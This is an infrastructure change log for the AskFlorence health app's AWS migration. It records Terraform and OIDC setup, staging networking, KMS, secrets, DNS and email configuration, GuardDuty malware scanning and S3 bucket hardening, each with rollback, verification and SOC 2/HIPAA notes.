  • e24c5ca — src/lib/email.ts provider abstraction; /api/waitlist + /api/agents/discovery refactored to sendEmail(); @aws-sdk/client-sesv2 ^3.1033.0 added.
  • 44c1493 — EMAIL_FROM_DOMAIN override inside sendEmail(); infra/envs/staging/ecs.tf sets it to stage.askflorence.health.
  • 90d05af — task role SES policy widened to identity/*.
  • 04cfd35 — src/lib/posthog-server.ts fail-open + staging no-op; instrumentation-client.ts host-based opt-out via extended syncNoTrackMode; Dockerfile + workflow wiring for NEXT_PUBLIC_POSTHOG_PROJECT_TOKEN + NEXT_PUBLIC_POSTHOG_HOST; ECS task def env plumbed.

GitHub Actions:

  • Repo variables NEXT_PUBLIC_POSTHOG_PROJECT_TOKEN + NEXT_PUBLIC_POSTHOG_HOST set (public values, variables not secrets).
  • deploy-staging.yml build step passes both as --build-arg values to docker buildx build.

How

Same cross-account Terraform pattern from Phase 3: local env AWS_PROFILE=askflorence-staging; backend block in versions.tf assumes TerraformBackendRole in mgmt for state I/O. ECS module sets lifecycle { ignore_changes = [container_definitions] } on the task definition so CI/CD owns env-var + image updates — this session registered revisions :3–:8 out-of-band via aws ecs register-task-definition when env needed to change between GH Actions deploys. All AWS writes were via the staging SSO AdministratorAccess permission set or the GH Actions OIDC role from Phase 3.

Rollback

  • App-level: git revert any of the 4 commits and push to staging; GH Actions redeploys the prior image. All commits are additive + feature-flagged.
  • Task-def env changes: register a prior revision and update-service --task-definition <prior-arn>. Prior revisions retained per ECS defaults.
  • IAM widening: re-narrow the SesSend inline policy to identity/stage.askflorence.health; SES sends will start failing to sandbox recipients again but sends from the staging domain keep working.
  • Atlas user: atlas dbusers delete app_writer_waitlist --projectId 69e31af12fd2c0aef51bbb41; secret reverts to the pre-session PLACEHOLDER value.
  • No Vercel rollback needed — no Vercel change made.

Verification

All on stage.askflorence.health:

  • GET /api/health returns {"status":"ok","commit":"04cfd35...","env":"staging"}.
  • POST /api/waitlist returns 200 with real waitlist_submission_id; Mongo row present; AWS/SES/Send metric +1.
  • CloudWatch logs /aws/ecs/askflorence-staging-app: zero errors post-deploy.
  • Client bundle /_next/static/chunks/0u92fl5tvujj9.js contains both the expected PostHog token and the literal stage.askflorence.health (baked at build time, staging opt-out behavior present).
  • Vercel regression: npm run build green with EMAIL_PROVIDER unset; Resend send path unchanged.

2026-04-21T04:30Z — Phase 3a: Terraform scaffolding + GitHub Actions OIDC federation ​

Actor: taha.abbasi via SSO AdministratorAccess (mgmt + each member)
Linked: Issue #47, plan file ~/.claude/plans/hey-so-okay-that-delightful-eich.md Phase 3

Why ​

Phase 1–2.5 resources were provisioned by AWS CLI. Phase 3 introduces Terraform as the management layer for everything going forward. Phase 3a scope is minimal and non-destructive: state backend + per-account directory structure + OIDC federation so GitHub Actions can deploy without long-lived IAM keys. No existing Phase 1/2/2.5 resources are touched — they'll be terraform imported in Phase 3b (optional, later).

What shipped ​

State backend (management account 778477254880):

  • New S3 bucket askflorence-tfstate-778477254880 — versioning, SSE-KMS with alias/askflorence-data CMK, public access blocked, deny-non-SSL, org-wide read/write on env/<env>/* prefix via aws:PrincipalOrgID condition.
  • New DynamoDB table askflorence-tfstate-locks (PAY_PER_REQUEST, SSE-KMS) with resource policy allowing org principals to Get/Put/DeleteItem + DescribeTable.
  • KMS CMK alias/askflorence-data policy extended: org principals can GenerateDataKey/Decrypt/DescribeKey when ViaService matches s3.us-east-1.amazonaws.com.
  • New IAM role TerraformBackendRole (mgmt): trust scoped to aws:PrincipalOrgID == o-vefew8kgv1, inline policy grants tfstate bucket + DynamoDB + KMS access. Each env's backend config assumes this role for state operations. This is the canonical pattern because the Terraform S3 backend cannot reach state in another account cleanly without an assumed role.
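
As an illustration of the org-scoped trust described above, here is a minimal sketch that builds such a trust policy as a Python dict. The wildcard principal is an assumption; the real TerraformBackendRole policy is not reproduced in this log and may list account roots instead.

```python
import json

ORG_ID = "o-vefew8kgv1"  # organization ID quoted in this entry


def org_scoped_trust_policy(org_id: str) -> dict:
    """Trust policy that lets principals from one AWS organization assume a role."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                # Assumption: wildcard principal narrowed by the org condition.
                "Principal": {"AWS": "*"},
                "Action": "sts:AssumeRole",
                "Condition": {"StringEquals": {"aws:PrincipalOrgID": org_id}},
            }
        ],
    }


policy = org_scoped_trust_policy(ORG_ID)
print(json.dumps(policy, indent=2))
```

The condition key does the scoping: a principal outside the organization fails the StringEquals match even though the Principal element is a wildcard.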

Terraform directory structure (repo root infra/):

  • infra/README.md — layout + operations doc
  • infra/_shared/versions.tf + tags.tf — reference files; the backend blocks live per-env because backend config can't be templated with variables
  • infra/envs/management/ — mgmt account root (state key env/management/terraform.tfstate)
  • infra/envs/prod/ — prod account root (state key env/prod/terraform.tfstate)
  • infra/envs/staging/ — staging account root (state key env/staging/terraform.tfstate)
  • infra/envs/log-archive/ — log-archive account root (state key env/log-archive/terraform.tfstate)
  • infra/modules/ — empty (populated in Phase 4+ with network, ecs-service, cloudfront-waf, secrets, alb, ecr, monitoring)
  • infra/envs/management/outputs-reference.md — lists resources pending tf-import in Phase 3b

GitHub Actions OIDC federation (per account):

  • aws_iam_openid_connect_provider.github_actions with GitHub's pinned thumbprints in each of 4 accounts.
  • aws_iam_role.github_actions_deploy (GitHubActionsDeployRole) in each account, trust scoped to:
    • mgmt: main branch + staging branch + production environment + staging environment + PRs
    • prod: main branch + production environment only (staging branch cannot assume)
    • staging: staging branch + staging environment + PRs
    • log-archive: main branch + staging branch + PRs (state-only operations, no workload permissions)
  • Inline policies least-privilege: state read/write on own env prefix; prod/staging add scaffold ECR/ECS/CW Logs permissions (tightened to specific ARNs in Phase 5 when the cluster + repo exist); log-archive is state-only.
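
The per-account trust scoping above maps onto the `sub` claim of GitHub's OIDC token. The sketch below models that matrix with exact-match strings. The repository name is hypothetical (the real repo is not named in this entry), and the real trust policies may use StringLike patterns rather than exact values.

```python
REPO = "example-org/example-repo"  # hypothetical repository name


def sub_patterns(branches=(), environments=(), pull_requests=False, repo=REPO):
    """Build allowed values for the token.actions.githubusercontent.com:sub claim."""
    subs = [f"repo:{repo}:ref:refs/heads/{b}" for b in branches]
    subs += [f"repo:{repo}:environment:{e}" for e in environments]
    if pull_requests:
        subs.append(f"repo:{repo}:pull_request")
    return subs


# Trust matrix as listed in this entry.
TRUST = {
    "mgmt": sub_patterns(("main", "staging"), ("production", "staging"), True),
    "prod": sub_patterns(("main",), ("production",)),
    "staging": sub_patterns(("staging",), ("staging",), True),
    "log-archive": sub_patterns(("main", "staging"), (), True),
}


def can_assume(account: str, sub: str) -> bool:
    """True when a workflow presenting this sub claim may assume the account's role."""
    return sub in TRUST[account]


print(can_assume("prod", f"repo:{REPO}:ref:refs/heads/staging"))  # False
```

A check like this is useful as a review aid: it makes the "staging branch cannot assume prod" rule testable before the policy is applied.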

Versions ​

  • Terraform 1.14.9 (installed via direct HashiCorp download — the Homebrew binary on Taha's machine was x86_64 under Rosetta, which slowed provider plugin startup enough to time out; arm64 native at ~/.local/bin/terraform)
  • AWS provider ~> 6.0 (locked to 6.41.0 in .terraform.lock.hcl per env)
  • tls provider ~> 4.0

Verification ​

  • terraform plan on all 4 envs returns clean (exit code 0, "no changes").
  • All 4 GitHubActionsDeployRole ARNs present + assumable.
  • TerraformBackendRole assumable from SSO sessions in all 4 profiles (direct verification via sts assume-role).
  • State files present in s3://askflorence-tfstate-778477254880/env/{management,prod,staging,log-archive}/terraform.tfstate — versioned, KMS-encrypted.

SOC 2 / HIPAA / EDE relevance ​

  • SOC 2 CC6.1 (Logical Access) + CC8.1 (Change Management): IaC is now the documented path for AWS changes. Every future resource change appears as a tracked PR with diff review + test plan.
  • SOC 2 CC6.7 (transmission restrictions): tfstate bucket denies non-SSL, SSE-KMS encryption at rest.
  • Credential hygiene: zero long-lived IAM access keys for CI/CD. GitHub Actions uses OIDC + short-lived STS tokens only. Matches the Drata-readiness requirement from the migration plan.

Phase 3b (deferred, next session) ​

terraform import pass to bring existing Phase 1/2/2.5 resources into state. Full list in infra/envs/management/outputs-reference.md. Prioritized by impact: SCPs, SSO permission sets, budgets, CloudTrail, KMS keys, log buckets first; Drata stubs + IAM user policy details last.


2026-04-21T07:00Z — Phase 4 refactor: Route 53 subzone delegation + DNS-strategy decision ​

Actor: taha.abbasi via SSO AdministratorAccess in staging account 549136075525 (Terraform backend assumes TerraformBackendRole in mgmt)
Linked: Issue #47

DNS architecture decision — apex-on-Cloudflare + engineering subzone in Route 53 ​

Per Taha 2026-04-21, matching his prior AWS pattern:

  • askflorence.health apex stays on Cloudflare permanently. Cloudflare holds the G Suite MX records, the Google Search Console verification TXT, other site verifications, and (at Phase 10) the CNAME to the prod CloudFront distribution. The consumer-facing app at the apex continues to be served via Cloudflare DNS (DNS-only, no proxy), pointing to CloudFront through Cloudflare's CNAME-flattening feature.
  • stage.askflorence.health is a delegated Route 53 subzone in the staging AWS account. Every engineering DNS record under this subzone is Terraform-managed.
  • Phase 8 prod pattern (future): prod.askflorence.health → Route 53 in prod account for admin/internal/API endpoints. User-facing askflorence.health apex stays Cloudflare-authoritative.

Net effect: one-time 4 NS records at Cloudflare for staging (and later prod) instead of manually adding every individual AWS-side DNS record. Cloudflare remains the identity-verification + marketing DNS owner forever.

What shipped ​

Consolidation: SES staging identity migrated from staging.askflorence.health to stage.askflorence.health. One subdomain for both web (ACM + ALB + CloudFront) and email (SES DKIM + MAIL FROM + DMARC). Simpler DNS story, one subzone delegation, matches Taha's intent.

Terraform changes:

  • New infra/envs/staging/dns.tf with aws_route53_zone.staging for stage.askflorence.health.
  • modules/acm/ extended with manage_dns_in_route53 bool + route53_zone_id. When true, auto-creates validation CNAMEs and waits for issuance. When false, records still exposed via outputs for Cloudflare-manual addition (prod apex cert path if we ever need it).
  • modules/ses/ extended with the same boolean + zone ID pattern. When true, auto-creates DKIM CNAMEs + MAIL FROM MX/SPF + DMARC TXT in Route 53.
  • Used boolean (manage_dns_in_route53) rather than route53_zone_id != "" check because count and for_each can't evaluate on values that are "known after apply" (the freshly-created zone's ID was unknown at initial plan time).
  • Two-pass apply: terraform apply -target=aws_route53_zone.staging first to create the zone, then the full plan picked up the records.

Destroyed: previous staging.askflorence.health SES identity + mail_from_attributes (never had DNS backing, zero impact to remove).

Created: Route 53 zone stage.askflorence.health (Z06011002V7IQH7MBL1JY), new SES identity for stage.askflorence.health, 3 DKIM CNAME records, 1 MAIL FROM MX + 1 MAIL FROM SPF TXT, 1 DMARC TXT, 2 ACM validation CNAMEs (both SANs share the same validation record — allow_overwrite = true handles dedup), 1 aws_acm_certificate_validation wait resource.

Updated Taha next action ​

Add 4 NS records at Cloudflare (DNS-only, no proxy) delegating stage.askflorence.health to the 4 AWS nameservers listed in phase-4-staging-dns-records.md. Once propagated (~1-5 min), ACM auto-validates + SES auto-verifies. Zero other manual DNS work for the remainder of Phase 4-7 staging build.

Vercel prod impact ​

Zero. All changes isolated to staging AWS account + a future Cloudflare NS add.


2026-04-21T06:00Z — Phase 4: staging networking + KMS + Secrets Manager + ACM + SES ​

Actor: taha.abbasi via SSO AdministratorAccess in staging account 549136075525 (Terraform backend assumes TerraformBackendRole in mgmt for state)
Linked: Issue #47, plan file Phase 4 scope

What shipped ​

55 resources created in staging account via Terraform (infra/envs/staging/):

Networking (module: infra/modules/network):

  • VPC 10.40.0.0/16 with DNS hostnames + resolution enabled (vpc-0b074e33f5599c587)
  • 4 subnets across us-east-1a + us-east-1b: public 10.40.0.0/24 + 10.40.1.0/24, private 10.40.10.0/24 + 10.40.11.0/24
  • Internet Gateway + single NAT Gateway in us-east-1a (cost-optimized for staging; prod uses nat_ha=true for per-AZ NAT)
  • Route tables: 1 public (→ IGW), 2 private (→ single NAT via route), + all associations
  • VPC endpoints: S3 Gateway (free), and interface endpoints in us-east-1a only (single AZ cost optimization): kms, secretsmanager, bedrock-runtime (Bedrock Runtime endpoint is forward-looking per plan's Phase 3 migration readiness — unused today)
  • Security group askflorence-staging-vpc-endpoints allowing HTTPS from VPC CIDR
  • VPC Flow Logs → CloudWatch Log Group /aws/vpc/askflorence-staging/flow-logs with 7-day retention + IAM role for delivery
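
The CIDR layout above can be sanity-checked with the standard library. This is a sketch only: the subnet labels are hypothetical, since the entry does not say which CIDR sits in which AZ, and the prod CIDR is the planned value mentioned later in this entry.

```python
import ipaddress
from itertools import combinations

vpc = ipaddress.ip_network("10.40.0.0/16")

# Labels are hypothetical; only the CIDRs come from the entry.
subnets = {
    "public-1": "10.40.0.0/24",
    "public-2": "10.40.1.0/24",
    "private-1": "10.40.10.0/24",
    "private-2": "10.40.11.0/24",
}
nets = {name: ipaddress.ip_network(cidr) for name, cidr in subnets.items()}

# Every subnet must sit inside the VPC, and no two subnets may overlap.
all_inside = all(n.subnet_of(vpc) for n in nets.values())
no_overlap = not any(a.overlaps(b) for a, b in combinations(nets.values(), 2))

# The planned prod VPC CIDR should stay disjoint from staging.
prod_vpc = ipaddress.ip_network("10.20.0.0/16")
disjoint_from_prod = not vpc.overlaps(prod_vpc)

print(all_inside, no_overlap, disjoint_from_prod)
```

Keeping staging and prod CIDRs disjoint matters for the Phase 7 Atlas peering follow-up, where overlapping ranges would make routing ambiguous.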

KMS (module: infra/modules/kms):

  • CMK alias/askflorence-staging (ARN ending ...da11a033...3ec7e) with annual rotation + 30-day deletion window
  • Key policy: staging root IAM full access, Secrets Manager service (GenerateDataKey/Decrypt/DescribeKey), CloudWatch Logs service (Encrypt*/Decrypt*/ReEncrypt*/GenerateDataKey*/Describe*)

Secrets Manager shells (module: infra/modules/secrets):

  • 13 secrets under staging/* namespace, all encrypted with the staging CMK, all tagged with DataClass:
    • mongodb/app-read (phi), mongodb/survey-write (phi), mongodb/plans-write (pii), mongodb/agents-write (phi), mongodb/agents-admin (phi), mongodb/audit-read (phi), mongodb/waitlist-write (pii)
    • cms-api-key (cms_hub), posthog-key (pii), unsubscribe-token-secret (pii)
    • anthropic-api-key (phi), bedrock-runtime-role-arn (phi), openai-whisper-api-key (phi) — Florence workstream reservations
  • Each secret has a placeholder version (PLACEHOLDER-REPLACE-ME-OUT-OF-BAND) with lifecycle.ignore_changes on value — Terraform manages shell + tags, values populated out-of-band via CLI when actually needed
  • 30-day recovery window on deletion

ACM cert (module: infra/modules/acm):

  • Certificate for stage.askflorence.health + SAN *.stage.askflorence.health
  • ARN: arn:aws:acm:us-east-1:549136075525:certificate/3023432f-d564-4a3c-8db5-e4a7423c9c2f
  • Status: PENDING_VALIDATION (requires one CNAME at Cloudflare — see phase-4-staging-dns-records.md)

SES identity (module: infra/modules/ses):

  • Domain identity staging.askflorence.health
  • MAIL FROM subdomain mail.staging.askflorence.health
  • 3 DKIM tokens generated (RSA 2048-bit), 3 CNAMEs required at Cloudflare
  • Status: PENDING (requires 3 DKIM CNAMEs + MAIL FROM MX + SPF TXT + DMARC TXT at Cloudflare)
  • DMARC policy: p=none (monitor only — prod will tighten to quarantine or reject)

Module library at infra/modules/ ​

This Phase created the reusable Terraform module library that Phase 8 (prod mirror) will consume:

  • network/ — VPC + subnets + IGW + NAT (configurable HA) + route tables + SG + S3 Gateway endpoint + configurable interface endpoints (single or multi-AZ) + flow logs
  • kms/ — CMK + alias + rotation, extensible policy
  • secrets/ — Secrets Manager shells with lifecycle.ignore_changes on value (value lives out-of-band)
  • acm/ — Cert with DNS validation + output for Cloudflare records
  • ses/ — Email identity + MAIL FROM + DKIM + DMARC output for Cloudflare records

Phase 8 prod config will call the same modules with different inputs (e.g., nat_ha=true, interface_endpoint_multi_az=true, vpc_cidr="10.20.0.0/16", DMARC p=quarantine).

Vercel prod impact ​

Zero. All 55 resources live exclusively in the AWS staging account (549136075525). No Vercel env changes, no app code changes, no MongoDB changes. Vercel prod continues serving askflorence.health exactly as before.

Compliance implications ​

  • SOC 2 CC6.1 (Logical Access) + CC7.1 (Infrastructure Management): staging is now a separate network + IAM + encryption boundary from prod, managed via IaC.
  • SOC 2 CC6.7 (transmission): TLS-only policies already in place (tfstate bucket + KMS default + forthcoming ALB); staging workloads inherit.
  • HIPAA §164.312(a)(2)(iv) (encryption at rest): staging CMK rotation enabled; all Secrets Manager secrets SSE-KMS-encrypted with the CMK.
  • HIPAA §164.312(e)(2)(ii) (transmission encryption): the SES identity + DMARC/SPF/DKIM setup authenticates outbound email; calls to the SES API travel over TLS.
  • EDE Phase 3 / NIST 800-53 AU family: VPC Flow Logs capturing all traffic, retained 7 days in staging (prod will retain longer); CloudTrail already org-wide from Phase 2.
  • Data classification enforcement: every Secrets Manager shell tagged with DataClass per the plan's architectural principle. Future IAM policies can use aws:ResourceTag/DataClass conditions to grant access based on classification.
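
To make the tag-based access idea in the last bullet concrete, here is a minimal sketch of an identity policy keyed on the DataClass tag. The function name and Sid are hypothetical, and no such policy has shipped in this phase.

```python
import json


def dataclass_read_policy(allowed_classes: list[str]) -> dict:
    """Allow reading only secrets whose DataClass tag is in allowed_classes."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "ReadSecretsByDataClass",  # hypothetical Sid
                "Effect": "Allow",
                "Action": "secretsmanager:GetSecretValue",
                "Resource": "*",
                "Condition": {
                    "StringEquals": {"aws:ResourceTag/DataClass": allowed_classes}
                },
            }
        ],
    }


# Example: a role that may read pii-class secrets but not phi-class ones.
policy = dataclass_read_policy(["pii"])
print(json.dumps(policy, indent=2))
```

With this shape, adding a new secret needs no policy edit: tagging it with the right DataClass is what grants or withholds access.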

Taha next action (parallel / unblocks Phase 5) ​

Add 7 DNS records to Cloudflare DNS (DNS-only, no proxy) per phase-4-staging-dns-records.md:

  • 1 CNAME for ACM cert validation
  • 3 CNAMEs for SES DKIM
  • 1 MX + 1 TXT for SES MAIL FROM subdomain
  • 1 TXT for DMARC

After records propagate (~5-30 min), ACM transitions to ISSUED and SES to verified; Phase 5 can attach the cert to the ALB and start sending via SES.

Pending follow-up ​

  • Phase 5 ECS task role grants secretsmanager:GetSecretValue on the 13 secret ARNs and kms:Decrypt on the CMK for encrypted secret reads.
  • Phase 5 task role also grants ses:SendEmail / ses:SendRawEmail once SES identity is verified.
  • Phase 7 Atlas VPC peering updates the staging Atlas project with this VPC CIDR (10.40.0.0/16), removes Taha's laptop IP from the allowlist.

Cost estimate (pre-workload) ​

  • NAT Gateway: ~$33/mo
  • Interface endpoints (3 × single-AZ): ~$21/mo
  • CMK: $1/mo
  • Secrets Manager: ~$5/mo (13 secrets × $0.40)
  • ACM + SES identity: $0 (no charge for the public certificate or the unused identity)
  • Flow Logs (CloudWatch Logs 7d): ~$1/mo at idle
  • Total pre-workload: ~$61/mo

Will grow once ECS + ALB land in Phase 5.
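
The estimate can be reproduced from the line items. The figures below are the rounded monthly amounts quoted in the list, not current AWS list prices.

```python
# Monthly line items in USD, as quoted in the estimate above.
line_items = {
    "nat_gateway": 33.00,
    "interface_endpoints": 21.00,  # 3 single-AZ endpoints
    "cmk": 1.00,
    "secrets_manager": 13 * 0.40,  # 13 secrets at $0.40 each
    "acm_ses": 0.00,
    "flow_logs": 1.00,
}

total = sum(line_items.values())
print(round(line_items["secrets_manager"], 2), round(total))  # 5.2 61
```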


2026-04-21T03:00Z — Phase 2.5: close chrome-agent Phase 2 verification gaps ​

Actor: taha.abbasi via SSO AdministratorAccess (mgmt + log-archive delegated admin)
Linked: Issue #47, plan file ~/.claude/plans/hey-so-okay-that-delightful-eich.md (Phase 2.5 section)

Why ​

Chrome agent Phase 2 console verification was green on 5 of 6 checks but surfaced two specific fixable gaps + one not-yet-unblocked Taha action:

  1. GuardDuty feature plans (S3 data events, EBS malware, Runtime monitoring) showed "Do not auto-enable" on existing detectors. Root cause: my Phase 2 update-organization-configuration call used AutoEnable=NEW which only applies to future member accounts added to the org after the call — it does NOT retroactively push features to existing member detectors.
  2. GuardDuty console banner in log-archive: delegated admin lacks Organizations trusted access for Malware Protection. Blocks any cross-account feature push involving EBS malware.
  3. Budgets UI blocked for AdministratorAccess SSO on mgmt (Taha-only root-toggle follow-up — deferred, tracked below).

What shipped (2.5.2 — GuardDuty features retroactively enabled on all 4 detectors) ​

  • Enabled Organizations trusted access for malware-protection.guardduty.amazonaws.com from mgmt account. This was the prerequisite that unlocked the member-detector update path.
  • From log-archive (delegated admin), ran aws guardduty update-member-detectors against 778477254880 + 039624954211 + 549136075525 with features:
    • S3_DATA_EVENTS = ENABLED
    • EBS_MALWARE_PROTECTION = ENABLED
    • RUNTIME_MONITORING = ENABLED with ECS_FARGATE_AGENT_MANAGEMENT = ENABLED
  • Log-archive's own detector already had these enabled from Phase 2 direct update-detector calls.
  • Verified via get-detector on each of 4 detector IDs:
    • mgmt 9a71698300b24e55a21a53c4d8f660a9
    • prod 92cecfac97e0e00d20f77b575e742163
    • staging b6cecfac97da41f247f4f0e5de0e1b99
    • log-archive 44396c0b61674ade87312ff13ab85996

What shipped (2.5.3 — Malware Protection for S3) ​

  • New custom IAM role GuardDutyMalwareProtectionS3Role in mgmt (arn ending ...KMPVPMJZJ) with trust malware-protection-plan.guardduty.amazonaws.com + aws:SourceAccount == 778477254880. Scan permissions scoped strictly to the agent-survey-uploads/ prefix. Also kms:GenerateDataKey/Decrypt/DescribeKey on alias/askflorence-data so SSE-KMS objects can be scanned.
  • Malware Protection plan d4ced6e0c14fe707c26d created on askflorence-data bucket, prefix agent-survey-uploads/, Tagging action ENABLED. Status: ACTIVE.
  • End-to-end smoke test: uploaded a 295-byte blank PDF via /api/agents/discovery/upload, polled s3api get-object-tagging, scan tag GuardDutyMalwareScanStatus=NO_THREATS_FOUND applied within ~60 seconds. Test object cleaned up.
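
The polling step of the smoke test can be sketched as a small helper. This is an illustration, not the script used in the session: the tag lookup is injected as a callable so the example runs without AWS access, and the timeout and interval defaults are assumptions.

```python
import time
from typing import Callable, Optional

TAG_KEY = "GuardDutyMalwareScanStatus"


def wait_for_scan_status(
    fetch_tags: Callable[[], dict],
    timeout_s: float = 120.0,
    interval_s: float = 5.0,
    sleep: Callable[[float], None] = time.sleep,
) -> Optional[str]:
    """Poll until the scan tag appears; return its value, or None on timeout."""
    deadline = time.monotonic() + timeout_s
    while True:
        status = fetch_tags().get(TAG_KEY)
        if status is not None:
            return status
        if time.monotonic() >= deadline:
            return None
        sleep(interval_s)


# Stand-in for get-object-tagging: the tag is missing twice, then present.
responses = iter([{}, {}, {TAG_KEY: "NO_THREATS_FOUND"}])
print(wait_for_scan_status(lambda: next(responses), sleep=lambda _: None))
```

In a real run, `fetch_tags` would wrap the object-tagging call and flatten its tag set into a dict of key to value.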

Intentional scope exclusions (documented for audit trail) ​

  • Cross-account EBS Malware Protection grant (separate from the EBS_MALWARE_PROTECTION feature above). Skipped because we're Fargate-only with zero EBS volumes to scan. Deliberate scope limit, documented in guardduty-setup.md.
  • EKS / RDS / Lambda / EC2-agent features in GuardDuty. Services we don't run.
  • Security Hub Central configuration migration (noted by chrome agent). Deferred to Phase 3 or Phase 12 — cleaner to migrate once Terraform is managing Security Hub.

Deferred to Taha (2.5.1) ​

  • Enable IAM user/role access to billing information on mgmt account root. Requires root login (can't be done from SSO). Navigate to console top-right account menu → Account → "IAM User and Role Access to Billing Information" → Edit → Activate. Doesn't change any permissions; just lets existing policies take effect on the Billing Console.
  • After toggle: verify aws --profile askflorence budgets describe-budgets --account-id 778477254880 returns 5 budgets (was blocked at the IAM-billing-access layer before).

Compliance implications ​

  • SOC 2 CC7.2 (Change Detection) + CC7.3 (Anomaly Detection): every account now has S3 data event detection, Fargate runtime monitoring, and EBS malware detection where applicable. Coverage is consistent across the org.
  • HIPAA §164.308(a)(1)(ii)(D) (Information System Activity Review): agent PDF uploads are scanned after upload and tagged with the scan result; malware findings route to the GuardDuty console (and eventually EventBridge in Phase 11).
  • CMS EDE Phase 3: Malware Protection for S3 is defense-in-depth on the PHI-capable bucket. The intentional scope limits (no EKS/RDS/EC2 features) are documented so auditors see deliberate decisions, not gaps.

Pending follow-up ​

  • Taha flips the billing access toggle (2.5.1) whenever convenient — no urgency.
  • Phase 3 Terraform will tf-import the new IAM role GuardDutyMalwareProtectionS3Role, Malware Protection plan, and the retroactive detector feature state so everything becomes IaC.
  • Phase 11: EventBridge rule to forward GuardDutyMalwareScanStatus=THREATS_FOUND tags to alerting.

2026-04-21T02:00Z — askflorence-data bucket hardened per agent-survey-uploads runbook ​

Actor: taha.abbasi via SSO AdministratorAccess in management account 778477254880
Linked: Issue #47, Issue #56, commit 07fd8aa, docs/runbooks/s3-agent-survey-uploads.md

Why ​

Commit 07fd8aa shipped /api/agents/discovery/upload which writes blank-template PDFs (potentially PHI-adjacent per the runbook's PHI-confirmation gate) into s3://askflorence-data/agent-survey-uploads/. The bucket was only partially hardened at that commit — public access blocked and SSE-S3 encryption only, no versioning, no deny-non-SSL policy, no lifecycle rules, no customer-managed CMK. Closing that gap now as an AWS migration intake task before Phase 3 Terraform scaffolding (otherwise we'd be importing an unhardened bucket into IaC).

What changed ​

KMS CMK created in management account (778477254880):

  • Alias: alias/askflorence-data
  • ARN: arn:aws:kms:us-east-1:778477254880:key/88df2ce4-b694-4181-91b1-d0efc107429a
  • Key policy: mgmt root IAM + s3.amazonaws.com service-principal GenerateDataKey/Decrypt/DescribeKey
  • Annual auto-rotation enabled
  • Tags: Env=management, Owner=askflorence, ManagedBy=cli-phase2, DataClass=pii-phi

Bucket askflorence-data:

  • Versioning: Enabled (was: off)
  • Default encryption: SSE-KMS with alias/askflorence-data, BucketKeyEnabled=true (was: SSE-S3 AES256)
  • Bucket policy added: DenyNonSSLRequests (denies all S3 actions if aws:SecureTransport == false)
  • Lifecycle rules added:
    • AgentSurveyUploadsLifecycle (prefix agent-survey-uploads/): abort incomplete multipart uploads after 1 day, transition to Glacier Instant Retrieval after 180 days, expire non-current versions after 90 days.
    • AbortStalledMultipartUploadsGlobal (no prefix): abort incomplete multipart uploads after 7 days.
  • Tags added: same as CMK
  • Object Lock: intentionally not enabled. Compliance-mode Object Lock can't retrofit a bucket that wasn't created with it; per the runbook, this is deferred to Phase 4-5 where a new bucket with Object Lock enabled-at-creation will be stood up and data migrated. Tracked as a follow-up on #47.
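
For reference, a deny-non-SSL statement of the kind described above usually looks like the sketch below. It follows the common AWS pattern; the exact policy attached to askflorence-data is not reproduced in this log, so treat the resource list as an assumption.

```python
import json


def deny_non_ssl_policy(bucket: str) -> dict:
    """Bucket policy that denies every S3 action made over plain HTTP."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "DenyNonSSLRequests",
                "Effect": "Deny",
                "Principal": "*",
                "Action": "s3:*",
                # Cover both bucket-level and object-level requests.
                "Resource": [
                    f"arn:aws:s3:::{bucket}",
                    f"arn:aws:s3:::{bucket}/*",
                ],
                "Condition": {"Bool": {"aws:SecureTransport": "false"}},
            }
        ],
    }


policy = deny_non_ssl_policy("askflorence-data")
print(json.dumps(policy, indent=2))
```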

IAM user vercel-agent-survey-uploader (created by Taha 2026-04-20 to back the upload route):

  • Inline policy PutAgentSurveyUploads extended with:
    • kms:GenerateDataKey, kms:Encrypt, kms:DescribeKey on the new CMK ARN (required now that bucket default is SSE-KMS).
  • Existing s3:PutObject on askflorence-data/agent-survey-uploads/* unchanged.

Vercel env (production + preview):

  • Added S3_AGENT_SURVEY_KMS_KEY_ID = the new CMK ARN. Upload route in src/app/api/agents/discovery/upload/route.ts picks this up at line 119 and emits explicit ServerSideEncryption: aws:kms + SSEKMSKeyId: <arn> on each PutObject. Without this env var the route would fall back to SSE-S3 AES256 (which still works because we have no bucket policy forcing aws:kms, but loses the CMK audit trail).
  • Vercel redeploy (vercel --prod) required to pick up the env change.
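
The env-driven encryption choice described above can be summarized in a few lines. This is a Python sketch of the described behavior only; the real route is TypeScript and its code is not shown here, so the function name and structure are hypothetical.

```python
import os
from typing import Mapping


def sse_params(env: Mapping[str, str] = os.environ) -> dict:
    """Pick PutObject encryption parameters from the environment."""
    key_id = env.get("S3_AGENT_SURVEY_KMS_KEY_ID")
    if key_id:
        # CMK configured: request SSE-KMS explicitly with that key.
        return {"ServerSideEncryption": "aws:kms", "SSEKMSKeyId": key_id}
    # No CMK configured: fall back to SSE-S3.
    return {"ServerSideEncryption": "AES256"}


cmk_arn = "arn:aws:kms:us-east-1:778477254880:key/88df2ce4-b694-4181-91b1-d0efc107429a"
print(sse_params({"S3_AGENT_SURVEY_KMS_KEY_ID": cmk_arn}))
print(sse_params({}))
```

The fallback branch is what keeps uploads working before the redeploy, at the cost of the per-key audit trail noted above.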

Compliance implications ​

  • HIPAA §164.312(a)(2)(iv) (encryption at rest): upgraded from SSE-S3 (AWS-managed) to SSE-KMS with customer-managed CMK. Audit trail for encryption operations now lands in CloudTrail via KMS data events (if enabled on the CMK — currently not; flag for Phase 4 to enable KMS data events on this key).
  • HIPAA §164.312(e)(2)(ii) (encryption in transit): deny-non-SSL bucket policy enforces TLS for all access.
  • SOC 2 CC6.7 (transmission restrictions): same.
  • Data retention: lifecycle rules document retention intent (180d hot, Glacier IR after that, non-current expires at 90d). Partial PHI deletion procedure already documented in runbook.
  • PHI-capable bucket in management account, not in a dedicated HIPAA-scoped account. Architectural debt noted: Phase 4 moves PHI-capable buckets into the prod member account (039624954211) where CloudTrail + Config + GuardDuty already scope per-account and SCPs tighten the blast radius.

Also followed ​

  • Runbook docs/runbooks/s3-agent-survey-uploads.md step 3 updated with the real CMK ARN (was <CMK-ID> placeholder).

Pending follow-up ​

  • vercel --prod redeploy so the app picks up S3_AGENT_SURVEY_KMS_KEY_ID. Taha's call when to trigger; no urgency since SSE-S3 fallback still works.
  • Phase 4-5: decision + execution on migrating to an Object Lock-enabled replacement bucket.
  • Phase 4: enable KMS data events on this CMK in CloudTrail (per-CMK granular audit trail).

